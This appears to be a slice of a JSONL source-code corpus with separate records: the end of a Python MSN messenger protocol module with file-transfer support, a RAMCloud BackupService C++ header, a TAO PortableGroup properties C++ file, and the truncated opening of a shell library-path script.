log.msg('Received munged file transfer request ... ignoring.')\n return 0\n self.gotSendRequest(fileName, fileSize, cookie, message)\n return 1\n\n def _checkFileResponse(self, message, info):\n \"\"\" helper method for checkMessage \"\"\"\n try:\n cmd = info['Invitation-Command'].upper()\n cookie = int(info['Invitation-Cookie'])\n except KeyError:\n return 0\n accept = (cmd == 'ACCEPT') and 1 or 0\n requested = self.cookies['iCookies'].get(cookie)\n if not requested:\n return 1\n requested[0].callback((accept, cookie, info))\n del self.cookies['iCookies'][cookie]\n return 1\n\n def _checkFileInfo(self, message, info):\n \"\"\" helper method for checkMessage \"\"\"\n try:\n ip = info['IP-Address']\n iCookie = int(info['Invitation-Cookie'])\n aCookie = int(info['AuthCookie'])\n cmd = info['Invitation-Command'].upper()\n port = int(info['Port'])\n except KeyError:\n return 0\n accept = (cmd == 'ACCEPT') and 1 or 0\n requested = self.cookies['external'].get(iCookie)\n if not requested:\n return 1 # we didn't ask for this\n requested[0].callback((accept, ip, port, aCookie, info))\n del self.cookies['external'][iCookie]\n return 1\n\n def checkMessage(self, message):\n \"\"\"\n hook for detecting any notification type messages\n (e.g. file transfer)\n \"\"\"\n cTypes = [s.lstrip() for s in message.getHeader('Content-Type').split(';')]\n if self._checkTyping(message, cTypes):\n return 0\n if 'text/x-msmsgsinvite' in cTypes:\n # header like info is sent as part of the message body.\n info = {}\n for line in message.message.split('\\r\\n'):\n try:\n key, val = line.split(':')\n info[key] = val.lstrip()\n except ValueError:\n continue\n if self._checkFileInvitation(message, info) or self._checkFileInfo(message, info) or self._checkFileResponse(message, info):\n return 0\n elif 'text/x-clientcaps' in cTypes:\n # do something with capabilities\n return 0\n return 1\n\n # negotiation\n def handle_USR(self, params):\n checkParamLen(len(params), 4, 'USR')\n if params[1] == \"OK\":\n self.loggedIn()\n\n # invite a user\n def handle_CAL(self, params):\n checkParamLen(len(params), 3, 'CAL')\n id = int(params[0])\n if params[1].upper() == \"RINGING\":\n self._fireCallback(id, int(params[2])) # session ID as parameter\n\n # user joined\n def handle_JOI(self, params):\n checkParamLen(len(params), 2, 'JOI')\n self.userJoined(params[0], unquote(params[1]))\n\n # users participating in the current chat\n def handle_IRO(self, params):\n checkParamLen(len(params), 5, 'IRO')\n self.pendingUsers[params[3]] = unquote(params[4])\n if params[1] == params[2]:\n self.gotChattingUsers(self.pendingUsers)\n self.pendingUsers = {}\n\n # finished listing users\n def handle_ANS(self, params):\n checkParamLen(len(params), 2, 'ANS')\n if params[1] == \"OK\":\n self.loggedIn()\n\n def handle_ACK(self, params):\n checkParamLen(len(params), 1, 'ACK')\n self._fireCallback(int(params[0]), None)\n\n def handle_NAK(self, params):\n checkParamLen(len(params), 1, 'NAK')\n self._fireCallback(int(params[0]), None)\n\n def handle_BYE(self, params):\n #checkParamLen(len(params), 1, 'BYE') # i've seen more than 1 param passed to this\n self.userLeft(params[0])\n\n # callbacks\n\n def loggedIn(self):\n \"\"\"\n called when all login details have been negotiated.\n Messages can now be sent, or new users invited.\n \"\"\"\n pass\n\n def gotChattingUsers(self, users):\n \"\"\"\n called after connecting to an existing chat session.\n\n @param users: A dict mapping user handles to screen names\n (current users taking part in the conversation)\n \"\"\"\n pass\n\n def userJoined(self, userHandle, screenName):\n \"\"\"\n called when a user has joined the conversation.\n\n @param userHandle: the user handle (passport) of the user\n @param screenName: the screen name of the user\n \"\"\"\n pass\n\n def userLeft(self, userHandle):\n \"\"\"\n called when a user has left the conversation.\n\n @param userHandle: the user handle (passport) of the user.\n \"\"\"\n pass\n\n def gotMessage(self, message):\n \"\"\"\n called when we receive a message.\n\n @param message: the associated MSNMessage object\n \"\"\"\n pass\n\n def userTyping(self, message):\n \"\"\"\n called when we receive the special type of message notifying\n us that a user is typing a message.\n\n @param message: the associated MSNMessage object\n \"\"\"\n pass\n\n def gotSendRequest(self, fileName, fileSize, iCookie, message):\n \"\"\"\n called when a contact is trying to send us a file.\n To accept or reject this transfer see the\n fileInvitationReply method.\n\n @param fileName: the name of the file\n @param fileSize: the size of the file\n @param iCookie: the invitation cookie, used so the client can\n match up your reply with this request.\n @param message: the MSNMessage object which brought about this\n invitation (it may contain more information)\n \"\"\"\n pass\n\n # api calls\n\n def inviteUser(self, userHandle):\n \"\"\"\n used to invite a user to the current switchboard server.\n\n @param userHandle: the user handle (passport) of the desired user.\n\n @return: A Deferred, the callback for which will be called\n when the server notifies us that the user has indeed\n been invited. The callback argument will be a tuple\n with 1 element, the sessionID given to the invited user.\n I'm not sure if this is useful or not.\n \"\"\"\n\n id, d = self._createIDMapping()\n self.sendLine(\"CAL %s %s\" % (id, userHandle))\n return d\n\n def sendMessage(self, message):\n \"\"\"\n used to send a message.\n\n @param message: the corresponding MSNMessage object.\n\n @return: Depending on the value of message.ack.\n If set to MSNMessage.MESSAGE_ACK or\n MSNMessage.MESSAGE_NACK a Deferred will be returned,\n the callback for which will be fired when an ACK or\n NACK is received - the callback argument will be\n (None,). If set to MSNMessage.MESSAGE_ACK_NONE then\n the return value is None.\n \"\"\"\n\n if message.ack not in ('A','N'):\n id, d = self._nextTransactionID(), None\n else:\n id, d = self._createIDMapping()\n if message.length == 0:\n message.length = message._calcMessageLen()\n self.sendLine(\"MSG %s %s %s\" % (id, message.ack, message.length))\n # apparently order matters with at least MIME-Version and Content-Type\n self.sendLine('MIME-Version: %s' % message.getHeader('MIME-Version'))\n self.sendLine('Content-Type: %s' % message.getHeader('Content-Type'))\n # send the rest of the headers\n for header in [h for h in message.headers.items() if h[0].lower() not in ('mime-version','content-type')]:\n self.sendLine(\"%s: %s\" % (header[0], header[1]))\n self.transport.write(CR+LF)\n self.transport.write(message.message)\n return d\n\n def sendTypingNotification(self):\n \"\"\"\n used to send a typing notification. Upon receiving this\n message the official client will display a 'user is typing'\n message to all other users in the chat session for 10 seconds.\n The official client sends one of these every 5 seconds (I think)\n as long as you continue to type.\n \"\"\"\n m = MSNMessage()\n m.ack = m.MESSAGE_ACK_NONE\n m.setHeader('Content-Type', 'text/x-msmsgscontrol')\n m.setHeader('TypingUser', self.userHandle)\n m.message = \"\\r\\n\"\n self.sendMessage(m)\n\n def sendFileInvitation(self, fileName, fileSize):\n \"\"\"\n send an notification that we want to send a file.\n\n @param fileName: the file name\n @param fileSize: the file size\n\n @return: A Deferred, the callback of which will be fired\n when the user responds to this invitation with an\n appropriate message. The callback argument will be\n a tuple with 3 elements, the first being 1 or 0\n depending on whether they accepted the transfer\n (1=yes, 0=no), the second being an invitation cookie\n to identify your follow-up responses and the third being\n the message 'info' which is a dict of information they\n sent in their reply (this doesn't really need to be used).\n If you wish to proceed with the transfer see the\n sendTransferInfo method.\n \"\"\"\n cookie = self._newInvitationCookie()\n d = Deferred()\n m = MSNMessage()\n m.setHeader('Content-Type', 'text/x-msmsgsinvite; charset=UTF-8')\n m.message += 'Application-Name: File Transfer\\r\\n'\n m.message += 'Application-GUID: %s\\r\\n' % (classNameToGUID[\"file transfer\"],)\n m.message += 'Invitation-Command: INVITE\\r\\n'\n m.message += 'Invitation-Cookie: %s\\r\\n' % str(cookie)\n m.message += 'Application-File: %s\\r\\n' % fileName\n m.message += 'Application-FileSize: %s\\r\\n\\r\\n' % str(fileSize)\n m.ack = m.MESSAGE_ACK_NONE\n self.sendMessage(m)\n self.cookies['iCookies'][cookie] = (d, m)\n return d\n\n def fileInvitationReply(self, iCookie, accept=1):\n \"\"\"\n used to reply to a file transfer invitation.\n\n @param iCookie: the invitation cookie of the initial invitation\n @param accept: whether or not you accept this transfer,\n 1 = yes, 0 = no, default = 1.\n\n @return: A Deferred, the callback for which will be fired when\n the user responds with the transfer information.\n The callback argument will be a tuple with 5 elements,\n whether or not they wish to proceed with the transfer\n (1=yes, 0=no), their ip, the port, the authentication\n cookie (see FileReceive/FileSend) and the message\n info (dict) (in case they send extra header-like info\n like Internal-IP, this doesn't necessarily need to be\n used). If you wish to proceed with the transfer see\n FileReceive.\n \"\"\"\n d = Deferred()\n m = MSNMessage()\n m.setHeader('Content-Type', 'text/x-msmsgsinvite; charset=UTF-8')\n m.message += 'Invitation-Command: %s\\r\\n' % (accept and 'ACCEPT' or 'CANCEL')\n m.message += 'Invitation-Cookie: %s\\r\\n' % str(iCookie)\n if not accept:\n m.message += 'Cancel-Code: REJECT\\r\\n'\n m.message += 'Launch-Application: FALSE\\r\\n'\n m.message += 'Request-Data: IP-Address:\\r\\n'\n m.message += '\\r\\n'\n m.ack = m.MESSAGE_ACK_NONE\n self.sendMessage(m)\n self.cookies['external'][iCookie] = (d, m)\n return d\n\n def sendTransferInfo(self, accept, iCookie, authCookie, ip, port):\n \"\"\"\n send information relating to a file transfer session.\n\n @param accept: whether or not to go ahead with the transfer\n (1=yes, 0=no)\n @param iCookie: the invitation cookie of previous replies\n relating to this transfer\n @param authCookie: the authentication cookie obtained from\n an FileSend instance\n @param ip: your ip\n @param port: the port on which an FileSend protocol is listening.\n \"\"\"\n m = MSNMessage()\n m.setHeader('Content-Type', 'text/x-msmsgsinvite; charset=UTF-8')\n m.message += 'Invitation-Command: %s\\r\\n' % (accept and 'ACCEPT' or 'CANCEL')\n m.message += 'Invitation-Cookie: %s\\r\\n' % iCookie\n m.message += 'IP-Address: %s\\r\\n' % ip\n m.message += 'Port: %s\\r\\n' % port\n m.message += 'AuthCookie: %s\\r\\n' % authCookie\n m.message += '\\r\\n'\n m.ack = m.MESSAGE_NACK\n self.sendMessage(m)\n\nclass FileReceive(LineReceiver):\n \"\"\"\n This class provides support for receiving files from contacts.\n\n @ivar fileSize: the size of the receiving file. (you will have to set this)\n @ivar connected: true if a connection has been established.\n @ivar completed: true if the transfer is complete.\n @ivar bytesReceived: number of bytes (of the file) received.\n This does not include header data.\n \"\"\"\n\n def __init__(self, auth, myUserHandle, file, directory=\"\", overwrite=0):\n \"\"\"\n @param auth: auth string received in the file invitation.\n @param myUserHandle: your userhandle.\n @param file: A string or file object represnting the file\n to save data to.\n @param directory: optional parameter specifiying the directory.\n Defaults to the current directory.\n @param overwrite: if true and a file of the same name exists on\n your system, it will be overwritten. (0 by default)\n \"\"\"\n self.auth = auth\n self.myUserHandle = myUserHandle\n self.fileSize = 0\n self.connected = 0\n self.completed = 0\n self.directory = directory\n self.bytesReceived = 0\n self.overwrite = overwrite\n\n # used for handling current received state\n self.state = 'CONNECTING'\n self.segmentLength = 0\n self.buffer = ''\n\n if isinstance(file, types.StringType):\n path = os.path.join(directory, file)\n if os.path.exists(path) and not self.overwrite:\n log.msg('File already exists...')\n raise IOError, \"File Exists\" # is this all we should do here?\n self.file = open(os.path.join(directory, file), 'wb')\n else:\n self.file = file\n\n def connectionMade(self):\n self.connected = 1\n self.state = 'INHEADER'\n self.sendLine('VER MSNFTP')\n\n def connectionLost(self, reason):\n self.connected = 0\n self.file.close()\n\n def parseHeader(self, header):\n \"\"\" parse the header of each 'message' to obtain the segment length \"\"\"\n\n if ord(header[0]) != 0: # they requested that we close the connection\n self.transport.loseConnection()\n return\n try:\n extra, factor = header[1:]\n except ValueError:\n # munged header, ending transfer\n self.transport.loseConnection()\n raise\n extra = ord(extra)\n factor = ord(factor)\n return factor * 256 + extra\n\n def lineReceived(self, line):\n temp = line.split()\n if len(temp) == 1:\n params = []\n else:\n params = temp[1:]\n cmd = temp[0]\n handler = getattr(self, \"handle_%s\" % cmd.upper(), None)\n if handler:\n handler(params) # try/except\n else:\n self.handle_UNKNOWN(cmd, params)\n\n def rawDataReceived(self, data):\n bufferLen = len(self.buffer)\n if self.state == 'INHEADER':\n delim = 3-bufferLen\n self.buffer += data[:delim]\n if len(self.buffer) == 3:\n self.segmentLength = self.parseHeader(self.buffer)\n if not self.segmentLength:\n return # hrm\n self.buffer = \"\"\n self.state = 'INSEGMENT'\n extra = data[delim:]\n if len(extra) > 0:\n self.rawDataReceived(extra)\n return\n\n elif self.state == 'INSEGMENT':\n dataSeg = data[:(self.segmentLength-bufferLen)]\n self.buffer += dataSeg\n self.bytesReceived += len(dataSeg)\n if len(self.buffer) == self.segmentLength:\n self.gotSegment(self.buffer)\n self.buffer = \"\"\n if self.bytesReceived == self.fileSize:\n self.completed = 1\n self.buffer = \"\"\n self.file.close()\n self.sendLine(\"BYE 16777989\")\n return\n self.state = 'INHEADER'\n extra = data[(self.segmentLength-bufferLen):]\n if len(extra) > 0:\n self.rawDataReceived(extra)\n return\n\n def handle_VER(self, params):\n checkParamLen(len(params), 1, 'VER')\n if params[0].upper() == \"MSNFTP\":\n self.sendLine(\"USR %s %s\" % (self.myUserHandle, self.auth))\n else:\n log.msg('they sent the wrong version, time to quit this transfer')\n self.transport.loseConnection()\n\n def handle_FIL(self, params):\n checkParamLen(len(params), 1, 'FIL')\n try:\n self.fileSize = int(params[0])\n except ValueError: # they sent the wrong file size - probably want to log this\n self.transport.loseConnection()\n return\n self.setRawMode()\n self.sendLine(\"TFR\")\n\n def handle_UNKNOWN(self, cmd, params):\n log.msg('received unknown command (%s), params: %s' % (cmd, params))\n\n def gotSegment(self, data):\n \"\"\" called when a segment (block) of data arrives. \"\"\"\n self.file.write(data)\n\nclass FileSend(LineReceiver):\n \"\"\"\n This class provides support for sending files to other contacts.\n\n @ivar bytesSent: the number of bytes that have currently been sent.\n @ivar completed: true if the send has completed.\n @ivar connected: true if a connection has been established.\n @ivar targetUser: the target user (contact).\n @ivar segmentSize: the segment (block) size.\n @ivar auth: the auth cookie (number) to use when sending the\n transfer invitation\n \"\"\"\n\n def __init__(self, file):\n \"\"\"\n @param file: A string or file object represnting the file to send.\n \"\"\"\n\n if isinstance(file, types.StringType):\n self.file = open(file, 'rb')\n else:\n self.file = file\n\n self.fileSize = 0\n self.bytesSent = 0\n self.completed = 0\n self.connected = 0\n self.targetUser = None\n self.segmentSize = 2045\n self.auth = randint(0, 2**30)\n self._pendingSend = None # :(\n\n def connectionMade(self):\n self.connected = 1\n\n def connectionLost(self, reason):\n if self._pendingSend.active():\n self._pendingSend.cancel()\n self._pendingSend = None\n if self.bytesSent == self.fileSize:\n self.completed = 1\n self.connected = 0\n self.file.close()\n\n def lineReceived(self, line):\n temp = line.split()\n if len(temp) == 1:\n params = []\n else:\n params = temp[1:]\n cmd = temp[0]\n handler = getattr(self, \"handle_%s\" % cmd.upper(), None)\n if handler:\n handler(params)\n else:\n self.handle_UNKNOWN(cmd, params)\n\n def handle_VER(self, params):\n checkParamLen(len(params), 1, 'VER')\n if params[0].upper() == \"MSNFTP\":\n self.sendLine(\"VER MSNFTP\")\n else: # they sent some weird version during negotiation, i'm quitting.\n self.transport.loseConnection()\n\n def handle_USR(self, params):\n checkParamLen(len(params), 2, 'USR')\n self.targetUser = params[0]\n if self.auth == int(params[1]):\n self.sendLine(\"FIL %s\" % (self.fileSize))\n else: # they failed the auth test, disconnecting.\n self.transport.loseConnection()\n\n def handle_TFR(self, params):\n checkParamLen(len(params), 0, 'TFR')\n # they are ready for me to start sending\n self.sendPart()\n\n def handle_BYE(self, params):\n self.completed = (self.bytesSent == self.fileSize)\n self.transport.loseConnection()\n\n def handle_CCL(self, params):\n self.completed = (self.bytesSent == self.fileSize)\n self.transport.loseConnection()\n\n def handle_UNKNOWN(self, cmd, params):\n log.msg('received unknown command (%s), params: %s' % (cmd, params))\n\n def makeHeader(self, size):\n \"\"\" make the appropriate header given a specific segment size. \"\"\"\n quotient, remainder = divmod(size, 256)\n return chr(0) + chr(remainder) + chr(quotient)\n\n def sendPart(self):\n \"\"\" send a segment of data \"\"\"\n if not self.connected:\n self._pendingSend = None\n return # may be buggy (if handle_CCL/BYE is called but self.connected is still 1)\n data = self.file.read(self.segmentSize)\n if data:\n dataSize = len(data)\n header = self.makeHeader(dataSize)\n self.bytesSent += dataSize\n self.transport.write(header + data)\n self._pendingSend = reactor.callLater(0, self.sendPart)\n else:\n self._pendingSend = None\n self.completed = 1\n\n# mapping of error codes to error messages\nerrorCodes = {\n\n 200 : \"Syntax error\",\n 201 : \"Invalid parameter\",\n 205 : \"Invalid user\",\n 206 : \"Domain name missing\",\n 207 : \"Already logged in\",\n 208 : \"Invalid username\",\n 209 : \"Invalid screen name\",\n 210 : \"User list full\",\n 215 : \"User already there\",\n 216 : \"User already on list\",\n 217 : \"User not online\",\n 218 : \"Already in mode\",\n 219 : \"User is in the opposite list\",\n 223 : \"Too many groups\",\n 224 : \"Invalid group\",\n 225 : \"User not in group\",\n 229 : \"Group name too long\",\n 230 : \"Cannot remove group 0\",\n 231 : \"Invalid group\",\n 280 : \"Switchboard failed\",\n 281 : \"Transfer to switchboard failed\",\n\n 300 : \"Required field missing\",\n 301 : \"Too many FND responses\",\n 302 : \"Not logged in\",\n\n 500 : \"Internal server error\",\n 501 : \"Database server error\",\n 502 : \"Command disabled\",\n 510 : \"File operation failed\",\n 520 : \"Memory allocation failed\",\n 540 : \"Wrong CHL value sent to server\",\n\n 600 : \"Server is busy\",\n 601 : \"Server is unavaliable\",\n 602 : \"Peer nameserver is down\",\n 603 : \"Database connection failed\",\n 604 : \"Server is going down\",\n 605 : \"Server unavailable\",\n\n 707 : \"Could not create connection\",\n 710 : \"Invalid CVR parameters\",\n 711 : \"Write is blocking\",\n 712 : \"Session is overloaded\",\n 713 : \"Too many active users\",\n 714 : \"Too many sessions\",\n 715 : \"Not expected\",\n 717 : \"Bad friend file\",\n 731 : \"Not expected\",\n\n 800 : \"Requests too rapid\",\n\n 910 : \"Server too busy\",\n 911 : \"Authentication failed\",\n 912 : \"Server too busy\",\n 913 : \"Not allowed when offline\",\n 914 : \"Server too busy\",\n 915 : \"Server too busy\",\n 916 : \"Server too busy\",\n 917 : \"Server too busy\",\n 918 : \"Server too busy\",\n 919 : \"Server too busy\",\n 920 : \"Not accepting new users\",\n 921 : \"Server too busy\",\n 922 : \"Server too busy\",\n 923 : \"No parent consent\",\n 924 : \"Passport account not yet verified\"\n\n}\n\n# mapping of status codes to readable status format\nstatusCodes = {\n\n STATUS_ONLINE : \"Online\",\n STATUS_OFFLINE : \"Offline\",\n STATUS_HIDDEN : \"Appear Offline\",\n STATUS_IDLE : \"Idle\",\n STATUS_AWAY : \"Away\",\n STATUS_BUSY : \"Busy\",\n STATUS_BRB : \"Be Right Back\",\n STATUS_PHONE : \"On the Phone\",\n STATUS_LUNCH : \"Out to Lunch\"\n\n}\n\n# mapping of list ids to list codes\nlistIDToCode = {\n\n FORWARD_LIST : 'fl',\n BLOCK_LIST : 'bl',\n ALLOW_LIST : 'al',\n REVERSE_LIST : 'rl'\n\n}\n\n# mapping of list codes to list ids\nlistCodeToID = {}\nfor id,code in listIDToCode.items():\n listCodeToID[code] = id\n\ndel id, code\n\n# Mapping of class GUIDs to simple english names\nguidToClassName = {\n \"{5D3E02AB-6190-11d3-BBBB-00C04F795683}\": \"file transfer\",\n }\n\n# Reverse of the above\nclassNameToGUID = {}\nfor guid, name in guidToClassName.iteritems():\n classNameToGUID[name] = guid\n"} {"text": "/* Copyright (c) 2009-2012 Stanford University\n *\n * Permission to use, copy, modify, and distribute this software for any\n * purpose with or without fee is hereby granted, provided that the above\n * copyright notice and this permission notice appear in all copies.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR(S) DISCLAIM ALL WARRANTIES\n * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL AUTHORS BE LIABLE FOR\n * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n */\n\n#ifndef RAMCLOUD_BACKUPSERVICE_H\n#define RAMCLOUD_BACKUPSERVICE_H\n\n#include \n#include \n\n#include \"Common.h\"\n#include \"BackupClient.h\"\n#include \"BackupMasterRecovery.h\"\n#include \"BackupStorage.h\"\n#include \"CoordinatorClient.h\"\n#include \"MasterClient.h\"\n#include \"Service.h\"\n#include \"ServerConfig.h\"\n#include \"TaskQueue.h\"\n\nnamespace RAMCloud {\n\n/**\n * Handles rpc requests from Masters and the Coordinator to persistently store\n * replicas of segments and to facilitate the recovery of object data when\n * masters crash.\n */\nclass BackupService : public Service\n , ServerTracker::Callback {\n PUBLIC:\n BackupService(Context* context, const ServerConfig* config);\n virtual ~BackupService();\n void benchmark();\n void dispatch(WireFormat::Opcode opcode, Rpc* rpc);\n ServerId getFormerServerId() const;\n ServerId getServerId() const;\n uint32_t getReadSpeed() { return readSpeed; }\n\n PRIVATE:\n void freeSegment(const WireFormat::BackupFree::Request* reqHdr,\n WireFormat::BackupFree::Response* respHdr,\n Rpc* rpc);\n void getRecoveryData(\n const WireFormat::BackupGetRecoveryData::Request* reqHdr,\n WireFormat::BackupGetRecoveryData::Response* respHdr,\n Rpc* rpc);\n void killAllStorage();\n void recoveryComplete(\n const WireFormat::BackupRecoveryComplete::Request* reqHdr,\n WireFormat::BackupRecoveryComplete::Response* respHdr,\n Rpc* rpc);\n void restartFromStorage();\n void startReadingData(\n const WireFormat::BackupStartReadingData::Request* reqHdr,\n WireFormat::BackupStartReadingData::Response* respHdr,\n Rpc* rpc);\n void startPartitioningReplicas(\n const WireFormat::BackupStartPartitioningReplicas::Request* reqHdr,\n WireFormat::BackupStartPartitioningReplicas::Response* respHdr,\n Rpc* rpc);\n void writeSegment(const WireFormat::BackupWrite::Request* req,\n WireFormat::BackupWrite::Response* resp,\n Rpc* rpc);\n void gcMain();\n void initOnceEnlisted();\n void trackerChangesEnqueued();\n\n /**\n * Shared RAMCloud information.\n */\n Context* context;\n\n /**\n * Provides mutual exclusion between handling RPCs and garbage collector.\n * Locked once for all RPCs in dispatch().\n */\n std::mutex mutex;\n typedef std::mutex Mutex;\n typedef std::unique_lock Lock;\n\n /// Settings passed to the constructor\n const ServerConfig* config;\n\n /**\n * If the backup was formerly part of a cluster this was its server id.\n * This is extracted from a superblock that is part of BackupStorage.\n * \"Rejoining\" means this backup service may have segment replicas stored\n * that were created by masters in the cluster.\n * In this case, the coordinator must be made told of the former server\n * id under which these replicas were created in order to ensure that\n * all masters are made aware of the former server's crash before learning\n * of its re-enlistment.\n */\n ServerId formerServerId;\n\n /**\n * The storage backend where closed segments are to be placed.\n * Must come before #frames so that if the reference count of some frames\n * drops to zero when the map is destroyed won't have been destroyed yet\n * in the storage instance.\n */\n PUBLIC:\n std::unique_ptr storage;\n PRIVATE:\n\n /// Type of the key for the frame map.\n struct MasterSegmentIdPair {\n MasterSegmentIdPair(ServerId masterId, uint64_t segmentId)\n : masterId(masterId)\n , segmentId(segmentId)\n {\n }\n\n /// Comparison is needed for the type to be a key in a map.\n bool\n operator<(const MasterSegmentIdPair& right) const\n {\n return std::make_pair(*masterId, segmentId) <\n std::make_pair(*right.masterId, right.segmentId);\n }\n\n ServerId masterId;\n uint64_t segmentId;\n };\n /// Type of the frame map.\n typedef std::map FrameMap;\n /**\n * Mapping from (MasterId, SegmentId) to a BackupStorage::FrameRef for\n * replicas that are currently open or in storage.\n */\n FrameMap frames;\n\n /**\n * Master recoveries this backup is participating in; maps a crashed master\n * id to the most recent recovery that was started for it. Entries\n * added in startReadingData and removed by garbage collection tasks when\n * the crashed master is marked as down in the server list.\n */\n std::map recoveries;\n\n /// The uniform size of each segment this backup deals with.\n const uint32_t segmentSize;\n\n /// The results of storage.benchmark() in MB/s.\n uint32_t readSpeed;\n\n /// For unit testing.\n uint64_t bytesWritten;\n\n /// Used to ensure that init() is invoked before the dispatcher runs.\n bool initCalled;\n\n /// Used to determine server status of masters for garbage collection.\n ServerTracker gcTracker;\n\n /// Runs garbage collection tasks.\n Tub gcThread;\n\n /// For testing; don't start gcThread when tracker changes are enqueued.\n bool testingDoNotStartGcThread;\n\n /// Set during unit tests to skip the check that ensures the caller is\n /// actually in the cluster.\n bool testingSkipCallerIdCheck;\n\n /**\n * Executes enqueued tasks for replica garbage collection and master\n * recovery.\n */\n TaskQueue taskQueue;\n\n /**\n * Counts old replicas (those that existed at startup) that have\n * not yet been freed by the garbage collector. This value should\n * become zero pretty soon after startup.\n */\n int oldReplicas;\n\n /**\n * Try to garbage collect replicas from a particular master found on disk\n * until it is finally removed. Usually replicas are freed explicitly by\n * masters, but this doesn't work for cases where the replica was found on\n * disk as part of an old master.\n *\n * This task may generate RPCs to the master to determine the status of the\n * replica which survived on-storage across backup failures.\n */\n class GarbageCollectReplicasFoundOnStorageTask : public Task {\n PUBLIC:\n GarbageCollectReplicasFoundOnStorageTask(BackupService& service,\n ServerId masterId);\n void addSegmentId(uint64_t segmentId);\n void performTask();\n\n PRIVATE:\n bool tryToFreeReplica(uint64_t segmentId);\n void deleteReplica(uint64_t segmentId);\n\n /// Backup which is trying to garbage collect the replica.\n BackupService& service;\n\n /// Id of the master which originally created the replica.\n ServerId masterId;\n\n /// Segment ids of the replicas which are candidates for removal.\n std::deque segmentIds;\n\n /**\n * Space for a rpc to the master to ask it explicitly if it would\n * like this replica to be retain as it makes more replica elsewhere.\n */\n Tub rpc;\n\n DISALLOW_COPY_AND_ASSIGN(GarbageCollectReplicasFoundOnStorageTask);\n };\n friend class GarbageCollectReplicaFoundOnStorageTask;\n\n /**\n * Garbage collect all state for a now down master. This includes any\n * replicas created by it as well as any outstanding recovery state for it.\n * Downed servers are known to be fully recovered and out of the cluster, so\n * this is safe. Usually replicas are freed explicitly by masters, but this\n * doesn't work for cases where the replica was created by a master which\n * has crashed.\n */\n class GarbageCollectDownServerTask : public Task {\n PUBLIC:\n GarbageCollectDownServerTask(BackupService& service, ServerId masterId);\n void performTask();\n\n PRIVATE:\n /// Backup trying to garbage collect replicas from some removed master.\n BackupService& service;\n\n /// Id of the master now known to have been removed from the cluster.\n ServerId masterId;\n\n DISALLOW_COPY_AND_ASSIGN(GarbageCollectDownServerTask);\n };\n friend class GarbageCollectDownServerTask;\n\n DISALLOW_COPY_AND_ASSIGN(BackupService);\n};\n\n} // namespace RAMCloud\n\n#endif\n"} {"text": "// -*- C++ -*-\n\n//=============================================================================\n/**\n * @file PG_Properties_Support.cpp\n *\n * This file implements classes to help manage PortableGroup::Properties\n *\n * @author Dale Wilson \n */\n//=============================================================================\n\n#include \"orbsvcs/PortableGroup/PG_Properties_Support.h\"\n\nTAO_BEGIN_VERSIONED_NAMESPACE_DECL\n\nTAO::PG_Properties_Support::PG_Properties_Support ()\n{\n TAO::PG_Property_Set *props;\n ACE_NEW_THROW_EX (props,\n TAO::PG_Property_Set (),\n CORBA::NO_MEMORY());\n this->default_properties_.reset (props);\n}\n\nTAO::PG_Properties_Support::~PG_Properties_Support ()\n{\n this->properties_map_.unbind_all ();\n}\n\nvoid TAO::PG_Properties_Support::set_default_property (const char * name,\n const PortableGroup::Value & value)\n{\n this->default_properties_->set_property(name, value);\n}\n\nvoid TAO::PG_Properties_Support::set_default_properties (const PortableGroup::Properties & props)\n{\n this->default_properties_->decode (props);\n}\n\nPortableGroup::Properties *\nTAO::PG_Properties_Support::get_default_properties ()\n{\n PortableGroup::Properties_var result;\n ACE_NEW_THROW_EX ( result, PortableGroup::Properties(), CORBA::NO_MEMORY());\n this->default_properties_->export_properties (*result);\n return result._retn ();\n}\n\nvoid TAO::PG_Properties_Support::remove_default_properties (\n const PortableGroup::Properties & props)\n{\n this->default_properties_->remove (props);\n}\n\nvoid\nTAO::PG_Properties_Support::set_type_properties (\n const char *type_id,\n const PortableGroup::Properties & overrides)\n{\n ACE_GUARD (TAO_SYNCH_MUTEX, guard, this->internals_);\n\n TAO::PG_Property_Set_var typeid_properties;\n if ( 0 != this->properties_map_.find (type_id, typeid_properties))\n {\n TAO::PG_Property_Set *props;\n ACE_NEW_THROW_EX (props,\n TAO::PG_Property_Set (overrides,\n this->default_properties_),\n CORBA::NO_MEMORY());\n typeid_properties.reset (props);\n this->properties_map_.bind (type_id, typeid_properties);\n }\n typeid_properties->clear ();\n typeid_properties->decode (overrides);\n}\n\nPortableGroup::Properties *\nTAO::PG_Properties_Support::get_type_properties (\n const char *type_id)\n{\n PortableGroup::Properties_var result;\n ACE_NEW_THROW_EX (result, PortableGroup::Properties(), CORBA::NO_MEMORY ());\n\n ACE_GUARD_RETURN (TAO_SYNCH_MUTEX, guard, this->internals_, 0);\n\n TAO::PG_Property_Set_var typeid_properties;\n if ( 0 != this->properties_map_.find (type_id, typeid_properties))\n {\n typeid_properties->export_properties (*result);\n }\n return result._retn ();\n}\n\nvoid\nTAO::PG_Properties_Support::remove_type_properties (\n const char *type_id,\n const PortableGroup::Properties & props)\n{\n // NOTE: do not actually delete the properties for this type.\n // There may be object groups depending on these.\n // Reference counted pointers could be used to allow property sets\n // for unused typeids to be deleted.\n\n ACE_GUARD (TAO_SYNCH_MUTEX, guard, this->internals_);\n\n TAO::PG_Property_Set_var typeid_properties;\n if ( 0 != this->properties_map_.find (type_id, typeid_properties))\n {\n typeid_properties->remove (props);\n }\n}\n\n\nTAO::PG_Property_Set_var\nTAO::PG_Properties_Support::find_typeid_properties (const char *type_id)\n{\n TAO::PG_Property_Set_var result;\n ACE_GUARD_RETURN (TAO_SYNCH_MUTEX, guard, this->internals_, result);\n\n if ( 0 != this->properties_map_.find (type_id, result))\n {\n TAO::PG_Property_Set * props;\n ACE_NEW_THROW_EX (props,\n TAO::PG_Property_Set (this->default_properties_),\n CORBA::NO_MEMORY());\n result.reset (props);\n this->properties_map_.bind (type_id, result);\n }\n return result;\n}\n\nTAO_END_VERSIONED_NAMESPACE_DECL\n"} {"text": "#! /bin/sh\n# Output a system dependent set of variables, describing how to set the\n# run time search path of shared libraries in an executable.\n#\n# Copyright 